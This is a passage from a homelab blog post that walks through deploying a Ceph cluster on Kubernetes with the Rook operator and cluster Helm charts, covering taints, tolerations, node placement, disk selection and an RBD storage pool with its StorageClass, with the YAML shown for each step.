using trusty old <code>rsync</code>.</p>
<h1 id="ceph-rook-setup">Ceph Rook setup</h1>
<p>To set up Rook, I&rsquo;m using the <a href="https://rook.io/docs/rook/latest-release/Helm-Charts/helm-charts/">Helm charts</a>.
There are two of them, one for the Rook operator and one for the cluster. With
this separation, multiple clusters can be controlled by the same operator. I&rsquo;m
not using that capability here, though.</p>
<p>The initial node setup isn&rsquo;t too interesting, safe for one thing, namely
the taints. As I noted above, while I would like to share the resources of the
Ceph hosts with other deployments, for now I&rsquo;ve added a <code>NoSchedule</code> taint.
I&rsquo;m adding this taint via the <a href="https://kubernetes.io/docs/reference/config-api/kubeadm-config.v1beta3/#kubeadm-k8s-io-v1beta3-JoinConfiguration">kubeadm join config</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">kubeadm.k8s.io/v1beta3</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">JoinConfiguration</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">nodeRegistration</span>:
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% if &#39;kube_ceph&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">taints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/taint.role&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Equal&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoSchedule&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% endif %}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kubeletExtraArgs</span>:
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% if &#39;kube_ceph&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab/role=ceph&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% elif &#39;kube_controllers&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab/role=controller&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% elif &#39;kube_workers&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab/role=worker&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% endif %}</span>
</span></span></code></pre></div><p>This file is put through Ansible&rsquo;s <a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/template_module.html">Template module</a>
during initial host setup, and I&rsquo;m then just joining the node to the cluster
via <code>kubeadm join --config /path/to/join.yaml</code>. Here, the <code>homelab/taint.role=ceph</code>
taint is added to all Ceph hosts, which are in my <code>kube_ceph</code> Ansible group.</p>
<p>Depending on which parts of Ceph you would like to use, you will also need to
make sure that all nodes (not just the Ceph nodes) have the <code>rbd</code> and <code>ceph</code>
kernel modules.</p>
<h1 id="rook-operator-setup">Rook operator setup</h1>
<p>As always, I&rsquo;m constructing my setup by reading through the default
<a href="https://github.com/rook/rook/blob/master/deploy/charts/rook-ceph/values.yaml">values.yaml file</a>.</p>
<p>But before looking at the config, let&rsquo;s look at what the operator actually
does: It takes the Ceph Rook CRDs and creates a full Ceph cluster from
them, including all the daemons necessary to run a full Ceph cluster. It also
takes care about changes in the CRDs and starts new daemons and re-configures
and deletes existing ones.</p>
<p>My configuration is rather simple:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/taint.role&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Equal&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoSchedule&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">homelab/role</span>: <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">priorityClassName</span>: <span style="color:#ae81ff">system-cluster-critical</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">csi</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enableMetadata</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">clusterName</span>: <span style="color:#ae81ff">k8s-rook</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">provisionerTolerations</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/taint.role&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Equal&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoSchedule&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceMonitor</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nfs</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">enableDiscoveryDaemon</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">discoveryDaemonInterval</span>: <span style="color:#ae81ff">6h</span>
</span></span></code></pre></div><p>There&rsquo;s not actually that much to configure in the operator itself. Most of
the Ceph config is done in the next chart, which defines the cluster proper.</p>
<p>First of all, I&rsquo;m defining some things for the deployment of the operator pod.
It should tolerate the previously mentioned <code>NoSchedule</code> taint on Ceph nodes
and also gets a <code>nodeSelector</code> for those nodes. Furthermore, I&rsquo;m assigning it
the highest scheduling <a href="https://kubernetes.io/docs/concepts/scheduling-eviction/pod-priority-preemption/#priorityclass">PriorityClass</a>.
I&rsquo;m not entirely sure this is really necessary, though. I&rsquo;ve just done it out of
reflex, because Ceph is pretty important in my Homelab stack. But the Operator
itself is not that important once the cluster has been initialized, until there&rsquo;s
a change in the cluster CRDs. In that case, the operator would be needed to make
the changes.</p>
<p>Then there&rsquo;s the CSI configs. In short, CSI is the <a href="https://github.com/container-storage-interface/spec">Container Storage Interface</a>. A standard for supplying storage to workloads. It&rsquo;s not
Kubernetes specific, although most implementations have been developed for k8s.
I&rsquo;m using <a href="https://github.com/ceph/ceph-csi">Ceph&rsquo;s CSI driver</a> on my Nomad
cluster, for example.
It consists of two parts. One is the provisioner, which manages the volumes and
talks to the Ceph and k8s clusters. The second part is a pod on each node,
which is mostly concerned with mounting the actual volumes when a pod running
on that node needs it.</p>
<p>I&rsquo;m defining the Ceph <code>NoSchedule</code> toleration here again, because this is
another piece of the infrastructure I want to allow to run on the Ceph nodes. But
I&rsquo;m not defining a <code>nodeSelector</code> on the Ceph nodes, because I don&rsquo;t want to
completely overload them, and it doesn&rsquo;t matter much where the provisioners are
running. While initially writing this, I had the following additional line
under the <code>csi</code> key in the <code>values.yaml</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">provisionerNodeAffinity</span>: <span style="color:#e6db74">&#34;homelab/role=ceph;&#34;</span>
</span></span></code></pre></div><p>But then, while writing a couple of things about which pods are deployed by
the operator, I realized that one of my MGR pods was in the pending state -
no space left on the two Ceph nodes. So I ended up removing the node affinity
for the provisioner pods, which balanced everything out again.</p>
<p>As in previous charts, I&rsquo;m explicitly disabling the metrics gathering, which I
will look at again later.</p>
<p>Finally, the <code>enableDiscoveryDaemon</code> and <code>discoveryDaemonInterval</code> configs
are related to dashboard functionality. As I&rsquo;ve shown above, the dashboard does
not show all disks at the moment. But without these options, the entire
<code>Physical Disks</code> page would be empty.</p>
<p>Okay. While looking at the pods in the operator namespace to verify which were
launched by the operator before any cluster was defined, I realized why I&rsquo;m not
getting any data on disks from my Ceph hosts: I did not set the Ceph <code>NoSchedule</code>
toleration on the discovery daemon containers. &#x1f926;</p>
<p>Here is what the &ldquo;Physical Disks&rdquo; page of the dashboard looked like up to now:</p>
<figure>
    <img loading="lazy" src="physical-disks.png"
         alt="A screenshot of the Ceph dashboard&#39;s UI. The table is headed &#39;Physical Disks&#39;. The &#39;Hostname&#39; column is blurred out. There are nine lines overall. The &#39;Size&#39; column contains only entries ranging for 4MB to 50 GB."/> <figcaption>
            <p>The physical disks list of the Ceph Dashboard. Note here that this list doesn&rsquo;t actually contain any of my Ceph hosts, and consequently none of the disks which are actually used as OSD disks at the time this screenshot was taken are actually shown.</p>
        </figcaption>
</figure>

<p>After the above realization, I&rsquo;ve added the following into the operator
<code>values.yaml</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">discover</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/taint.role&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Equal&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoSchedule&#34;</span>
</span></span></code></pre></div><p>This makes the disks visible:</p>
<figure>
    <img loading="lazy" src="appearing-disks.png"
         alt="A screenshot of the Ceph dashboard&#39;s UI. It shows a table of four disks. Two of them have &#39;QEMU&#39; as the vendor and &#39;QEMU HARDDISK&#39; as the Model. One is 8 TB in size, and one 2 TB. The third line has the model &#39;Samsung SSD 870&#39; and is 1 TB in size. The last line has a string of alphanumerics as the &#39;Model&#39; and a size of 4 TB."/> <figcaption>
            <p>The physical disks in my Ceph nodes finally appeared.</p>
        </figcaption>
</figure>

<p>Once the Helm chart for the operator is deployed, it will create a pod of the
operator itself as well as pods for the enabled CSI provisioners. In my case,
these are the RBD and CephFS provisioners.
Note that at this point, the actual Ceph cluster is not yet defined. None of
the Ceph daemons have been created, as the cluster is only defined in the next
chart.</p>
<h1 id="rook-cluster-setup">Rook cluster setup</h1>
<p>Now that the operator is running, I could create the actual Ceph cluster. This
is done via a separate Helm chart which can be found <a href="https://github.com/rook/rook/tree/master/deploy/charts/rook-ceph-cluster">here</a>.</p>
<p>This chart sets up the cluster with all its daemons, like the MONs, OSDs and
so forth. It can also be used to create pools for RBD, CephFS and RGW usage and
storage classes to make those available in the k8s cluster.</p>
<p>I will discuss my <code>values.yaml</code> file in pieces, to make it more manageable.</p>
<p>Let&rsquo;s start with some housekeeping:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">clusterName</span>: <span style="color:#ae81ff">k8s-rook</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">operatorNamespace</span>: <span style="color:#ae81ff">rook-ceph</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">toolbox</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">monitoring</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>Here I&rsquo;m supplying a cluster name (you know, just in case I end up running
multiple clusters one day &#x1f609;) and I set the namespace into which I deployed
the operator.</p>
<p>In addition, I&rsquo;m disabling the <code>toolbox</code>. This is a pod which can be used to
run Ceph commands against the cluster. But I don&rsquo;t need it, as I&rsquo;m using the
rook-ceph <code>kubectl</code> plugin, which I will show later.
I&rsquo;m also disabling monitoring here, as I haven&rsquo;t deployed Prometheus yet.</p>
<p>Then let&rsquo;s start with the cluster spec:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">cephClusterSpec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">mgr</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">modules</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pg_autoscaler</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">devicehealth</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">diskprediction_local</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dashboard</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ssl</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">network</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">provider</span>: <span style="color:#ae81ff">host</span>
</span></span></code></pre></div><p>Here I&rsquo;m enabling a couple of modules. The <code>pg_autoscaler</code> can automatically
scale up and down the <a href="https://docs.ceph.com/en/reef/rados/operations/placement-groups/">placement groups</a>
in the cluster. <code>devicehealth</code> is pretty much what it says on the tin - it
enables gathering SMART data. The <code>diskprediction_local</code> module is a related
tool, which uses the SMART data to make some guesses on how long your disks
still have to live at current usage. Docs can be found <a href="https://docs.ceph.com/en/quincy/mgr/diskprediction/">here</a>.
Finally, the <code>rook</code> module hooks into Ceph&rsquo;s orchestrator functionality, but as
I&rsquo;ve noted <a href="#why-rook">above</a>, it doesn&rsquo;t yet implement all the
functionality of the official <a href="https://docs.ceph.com/en/latest/cephadm/">cephadm</a>
deployment tool.</p>
<p>I&rsquo;m also disabling SSL for the dashboard. Simple reason is that it&rsquo;s not going
to be reachable directly from the outside, and all the cluster internal traffic
is secured by Cilium&rsquo;s encrypted WireGuard tunnels.</p>
<p>The <code>network.provider: host</code> config option is important. This config makes it
so that the Ceph daemons use the node&rsquo;s network, not the k8s cluster network.
So they will be reachable by all hosts in my Homelab subnet, without any routing
and without needing <code>LoadBalancer</code> services or ingresses. This is important for
me, because I don&rsquo;t just use my Ceph cluster for supplying volumes to k8s services, but also
for other things, like a mounted CephFS on my workstation and the root disks
for my Pis.</p>
<p>Next comes the placements:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">placement</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">all</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">nodeAffinity</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">requiredDuringSchedulingIgnoredDuringExecution</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">nodeSelectorTerms</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/taint.role&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Equal&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoSchedule&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mon</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">nodeAffinity</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">requiredDuringSchedulingIgnoredDuringExecution</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">nodeSelectorTerms</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;controller&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">effect</span>: <span style="color:#ae81ff">NoSchedule</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">node-role.kubernetes.io/control-plane</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">Exists</span>
</span></span></code></pre></div><p>Nothing too exiting. Worth noting perhaps is that I force my MON daemons to be
put on the controller nodes. This is a similar setup to what I&rsquo;ve got in my
baremetal/Nomad setup right now as well. The basic thought is to put all the
<code>server</code> components of all of my infrastructure on the same group of three hosts.
In addition, I&rsquo;m forcing all other Ceph daemons onto the Ceph nodes. That&rsquo;s just
so I know that as long as those nodes are up, I have a fully functional Ceph
cluster, e.g. for booting all of the other nodes in the cluster, which don&rsquo;t
have any attached storage.
I&rsquo;m still not sure how well this idea is really going to work out, and I will
have to do a full cluster shutdown test soonish, to make sure that the Ceph
cluster is able to come up fully and start serving requests without any other
worker node being online.</p>
<p>I&rsquo;m a bit worried how Kubernetes is going to behave in situations like this. I hope
it will just start scheduling the Ceph pods, and then once the Ceph cluster is
healthy I will be able to boot the diskless worker nodes.</p>
<p>And now for the storage definitions and dashboard ingress:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">useAllNodes</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">useAllDevices</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">nodes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;node1&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">devices</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/scsi-SQEMU_QEMU_HARDDISK_lxd_cephssd&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">ssd</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/scsi-SQEMU_QEMU_HARDDISK_lxd_cephhdd&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">hdd</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;node2&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">devices</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/wwn-1234&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">ssd</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/wwn-5678&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">hdd</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dashboard</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">host</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ceph-k8s.mei-home.net</span>
</span></span></code></pre></div><p>There are two basic options for configuring the storage. First, one can tell
Rook to use all nodes and all devices in those nodes. For me, that&rsquo;s not what
I want. I&rsquo;ve got a couple of dedicated Ceph nodes and dedicated storage inside
them. So I&rsquo;m using the setup shown here. It tells Rook to use the disks on
the two nodes <code>node1</code> and <code>node2</code>, and only those disks given here.</p>
<p>I&rsquo;m using the stable names here, instead of <code>/dev/sd*</code>. I&rsquo;m specifically using
the <code>by-id/wwn</code> numbers for the actual hard disks in my baremetal node to
ensure that I always get the correct disks. These <code>wwn-*</code> numbers are based on
the <a href="https://en.wikipedia.org/wiki/World_Wide_Name">World Wide Name</a> as provided
by the drives themselves, so they should be completely unique.
For some more details on the different ways of addressing disks, I found
<a href="https://wiki.archlinux.org/title/persistent_block_device_naming">the Arch wiki</a>
pretty useful.</p>
<p>And then there&rsquo;s also the ingress for the Ceph dashboard. Not much more than
defining which entrypoint from my Traefik Ingress it is supposed to use, and
under which domain it should be reachable.</p>
<p>One final note: You can do a lot of this setup piecemeal. Even without any nodes
in the list, you can already deploy the Helm chart, and then add the nodes
to the list as you add them to the k8s cluster. The same is true for the
next section, about the cluster pools and storage classes. I deployed the
cluster chart first without any pools defined, verified that all the base
daemons work and only then added the pools.</p>
<h1 id="setting-up-ceph-pools-and-storageclasses">Setting up Ceph pools and StorageClasses</h1>
<p>In this section, two concepts are combined. The first one are <a href="https://docs.ceph.com/en/latest/rados/operations/pools/">Ceph Pools</a>.
These pools are storage pools, logical pieces of your underlying disks. The same
disks can be used by multiple pools, the partition is purely logical. Pools are
also one of the units which can be used in setting permissions for Ceph auth.</p>
<p>One of the downsides of using Rook is that pools created through Rook cannot
be used for different applications. As noted before, Ceph can provide storage in
three forms: Block devices, CephFS as a POSIX compatible filesystem and S3
storage. In baremetal Ceph clusters, you can run multiple apps on the same pool.
But in Rook, each pool can only be used for one of the three storage applications.
Of course you can still create pools manually via the Ceph CLI and assign them
to multiple apps. But then you lose one of Rooks biggest advantages: Declarative
definition of Ceph.</p>
<p>The second concept are <a href="https://kubernetes.io/docs/concepts/storage/storage-classes/">Kubernetes StorageClasses</a>.
Those, similar to e.g. <a href="https://kubernetes.io/docs/concepts/services-networking/ingress/#ingress-class">IngressClasses</a>, describe a specific form of storage that a user can request for their
pod/volume.</p>
<p>I&rsquo;m using all three storage types Ceph supplies, so I will define pools and
storage classes for all of them.</p>
<h2 id="rbds">RBDs</h2>
<p>Let&rsquo;s start with the RBD pool(s). RBDs are block devices as per the Linux
definition. They&rsquo;re raw buckets of bytes and look the same to Linux as your
physical disks. Mounting them, in contrast to e.g. NFS exports, needs an extra
step though. This step is <code>mapping</code> them, which creates the <code>/dev/foo</code> device.
This can then be mounted, formatted with an FS and so on, similar to a normal
disk.
RBDs can be pretty efficient, especially with the <code>exclusive-lock</code> feature
enabled, which allows the client to assume that they will never have to give up
the lock on the RBD volume once acquired, until the device is <code>unmapped</code> again.
For that reason, they&rsquo;re my default volume. In my Rook setup, I have two pools,
with two different storage classes. One based on my SSDs, and one based on my
HDDs. Most volumes for my services will end up on the HDD pool, with a couple
of exceptions like databases. And yes, I&rsquo;ve been running a Postgres DB off of a
Ceph RBD volume for almost three years now, without any issues, including
power outages and the like.</p>
<p>Here, I will only show the SSD pool and storage class, as the HDD variant only
has a different name and a different <code>spec.deviceClass</code>.
So here we go:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">cephBlockPools</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replicated</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">size</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">failureDomain</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">ssd</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">min_size</span>: <span style="color:#e6db74">&#34;1&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">isDefault</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">reclaimPolicy</span>: <span style="color:#ae81ff">Retain</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allowVolumeExpansion</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumeBindingMode</span>: <span style="color:#e6db74">&#34;Immediate&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">imageFeatures</span>: <span style="color:#e6db74">&#34;layering,exclusive-lock,object-map,fast-diff&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/fstype</span>: <span style="color:#ae81ff">ext4</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/provisioner-secret-name</span>: <span style="color:#ae81ff">rook-csi-rbd-provisioner</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/provisioner-secret-namespace</span>: <span style="color:#e6db74">&#34;{{ .Release.Namespace }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/controller-expand-secret-name</span>: <span style="color:#ae81ff">rook-csi-rbd-provisioner</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/controller-expand-secret-namespace</span>: <span style="color:#e6db74">&#34;{{ .Release.Namespace }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/node-stage-secret-name</span>: <span style="color:#ae81ff">rook-csi-rbd-node</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/node-stage-secret-namespace</span>: <span style="color:#e6db74">&#34;{{ .Release.Namespace }}&#34;</span>
</span></span></code></pre></div><p>Let&rsquo;s start with the pool. I&rsquo;m running all of my pools as replicated pools, with
